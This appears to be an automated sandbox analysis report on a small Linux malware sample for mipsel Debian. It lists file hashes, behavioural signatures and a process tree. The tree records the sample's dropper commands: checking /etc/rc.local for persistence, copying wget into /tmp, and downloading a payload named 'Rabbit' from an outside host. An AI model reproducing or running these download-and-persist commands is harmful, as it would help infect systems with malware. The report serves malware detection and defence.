Analysis

  • max time kernel
    133s
  • max time network
    150s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
  • submitted
    07-08-2024 07:09

General

  • Target

    be0ba290644b18598fc2b4570668b0b75e351fb563423ac3d3386df0fc2a2204 (1)

  • Size

    2KB

  • MD5

    0ea832c7d725eda26ceb3edafd003a8a

  • SHA1

    8f2395dd84712798300b938822da816d805e5256

  • SHA256

    be0ba290644b18598fc2b4570668b0b75e351fb563423ac3d3386df0fc2a2204

  • SHA512

    8255058ffb6c2ea4ec4f9643020cbd8231313c13ba3ddf07d11c3b742704a296e5245cbc94ba848f48cf4ea87778be72f2ff3b494a0c02a5187797d22e935578

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies rc script 1 TTPs 1 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

  • Reads CPU attributes 1 TTPs 1 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/be0ba290644b18598fc2b4570668b0b75e351fb563423ac3d3386df0fc2a2204 (1)
    "/tmp/be0ba290644b18598fc2b4570668b0b75e351fb563423ac3d3386df0fc2a2204 (1)"
    1⤵
    • Modifies rc script
    PID:701
    • /bin/grep
      grep -v grep
      2⤵
      PID:707
    • /bin/cat
      cat /etc/rc.local
      2⤵
      PID:705
    • /bin/grep
      grep /etc/chongfu.sh
      2⤵
      PID:706
    • /bin/ps
      ps aux
      2⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:714
    • /bin/grep
      grep /tmp/Rabbit
      2⤵
      PID:715
    • /bin/grep
      grep -v grep
      2⤵
      PID:716
    • /usr/bin/wc
      wc -l
      2⤵
      PID:717
    • /bin/cp
      cp /usr/bin/wget .
      2⤵
      • Writes file to tmp directory
      PID:722
    • /bin/chmod
      chmod +x wget
      2⤵
      PID:724
    • /tmp/wget
      ./wget -P /tmp/ http://www.t-rabbit.click:10241/Rabbit
      2⤵
      • Executes dropped EXE
      PID:726

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /etc/rc.local

    Filesize

    21B

    MD5

    210e7e809dc51ae3b7ca88ad41c9cee5

    SHA1

    6213f44d196ecb0409da0e94d5fcf1642d59a693

    SHA256

    d11b3adb85e5c40d042e06871f3bd1316805538247de1b8e46b5e21ddace516b

    SHA512

    e0e8e4ade4de676bee84d458fa2d63944e7b6b6af91c2ccb0411ae72a1b581434a2165927c9428197ee2ddf70229ac688c52df491738d0f135d54cf2482750bf

  • /tmp/wget

    Filesize

    536KB

    MD5

    4a7c9f69532775b790e8d999f73a68b9

    SHA1

    9cf4d3d57284103e828dcaa514bfa76e84366472

    SHA256

    ba3dee31b794d6e0e2df228a87f54f3432100a4acfee8f1a7a64d2584cd80495

    SHA512

    925d73442f8a824ac2c016d1ce12293b30ced91cc3954ef74dbd604fc7b4a6c60227c82c52e5491ec3ba8d20a2a8d3b3b6739ef64cc242b9335a756f6631b128